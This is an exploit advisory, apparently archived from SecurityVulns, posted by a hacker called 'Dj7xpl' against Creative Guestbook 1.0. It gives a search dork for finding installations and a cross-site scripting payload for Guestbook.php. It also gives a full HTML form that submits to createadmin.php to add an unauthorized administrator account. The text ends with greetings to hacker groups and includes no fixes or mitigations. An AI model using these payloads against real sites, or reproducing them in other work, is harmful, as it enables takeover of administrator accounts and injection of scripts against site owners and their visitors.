SecurityvulnsSECURITYVULNS:DOC:16397Creative Guestbook 1.0 Multiple Remote Vulnerabilities
.-""""""""-.
/ Dj7xpl \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/_______________________________
(_)@8@8{}<________|-\IIIIII/-|________________________________>
)_/ \ /
(@
+____Iranian Are The Best In World+
Portal : Creative Guestbook 1.0
Download : http://www.thecreativeheads.de/CreativeFiles/downloads.php
Author : Dj7xpl | [email protected]
Dork : "Creative Guestbook"
Class : (Add Remote Admin User) And (Cross Site Scripting)
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
css/xss :
http://[Target]/[Path]/Guestbook.php <== Insert Yor Script
Example : <script> alert (' dj7xpl ^_^ ') </script>
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
Add Remote Admin User :
<form name="admin" method="post" action="http://[target]/[path]/createadmin.php?PHPSESSID='.session_id().'">
<input type="text" name="Name" value="name"><br>
<input type="text" name="Email"value="email"><br>
<input type="text" name="PASSWORD" value="password"><br>
<input type="submit" value="Admin hinzufügen" name="submit">
</form>
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh …
+_______________________________________________________________________________________________________________________+